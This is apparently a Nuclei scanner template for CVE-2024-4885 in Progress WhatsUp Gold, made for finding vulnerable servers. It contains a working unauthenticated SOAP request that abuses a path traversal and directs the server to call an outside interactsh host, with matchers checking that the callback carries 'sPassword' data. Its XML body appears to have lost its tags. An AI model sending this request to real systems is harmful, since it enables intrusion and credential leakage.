id: CVE-2024-4885 info: name: Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution author: SinSinology,iamnoooob,rootxharsh,pdresearch severity: critical description: | This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. reference: - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024 - https://www.zerodayinitiative.com/advisories/ZDI-24-893/ - https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ - https://www.progress.com/network-monitoring - https://github.com/sinsinology/CVE-2024-4885 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-4885 cwe-id: CWE-22 epss-score: 0.00066 epss-percentile: 0.29461 metadata: verified: true max-request: 1 shodan-query: html:"WhatsUp Gold" tags: cve,cve2024,rce,progress,whatsup,lfi http: - raw: - | POST /NmAPI/RecurringReport HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 SOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport falseNoneC:\PROGRA~2\Ipswitch\WhatsUp\Data\ScheduledReports25WhatsUpGold@YourDomain.comEmailing: Wireless Log5falseWhatsUp Goldtruefalsetrue00300htmlfalsefalsefalsefalse240PortraitLetterhtmlfalseg:i:s atrueC:\\Program Files (x86)\\Ipswitch\\WhatsUp\\html\\NmConsole\\falsefalse2e441d4d5a4b258b-11Intervaltruetruetruetruetruetruetrue13DayOfMonthFirstSunday11MinutesTimeInterval2024-07-05T16:59:14.047957+01:002024-07-05T16:59:14.047957+01:0013FirstSundayMarchDayOfYearMarch{"title":"foo","renderType":"aspx","reports":[{"title":"thetitle","url":"/NmConsole/api/Wireless/ReportWirelessLog","dateRangeFilter":{"label":"Date Range","n":0,"range":"Today","text":"Today"},"severityFilter":{"label":"Severity","value":-1,"text":"ALL"},"limit":50,"grid":{"emptyText":"[ No records found ]","columns":[{"dataIndex":"Date","text":"Date","flex":1},{"dataIndex":"Severity","text":"Severity","flex":1},{"dataIndex":"Message","text":"Message","flex":1}],"filters":[],"sorters":[]}}],"baseUrl":"http://{{interactsh-url}}","userId":1}1admin matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "sPassword" # digest: 4a0a00473045022025e6631dabad4579c99709729fae229ea1e0c525a01676fac07451061cb1d8b4022100c5b5f8a3ff93eb00c43a7639075d79f0ada4374abed4f2ad227cf2a326b33661:922c64590222798bb761d5b6d8e72950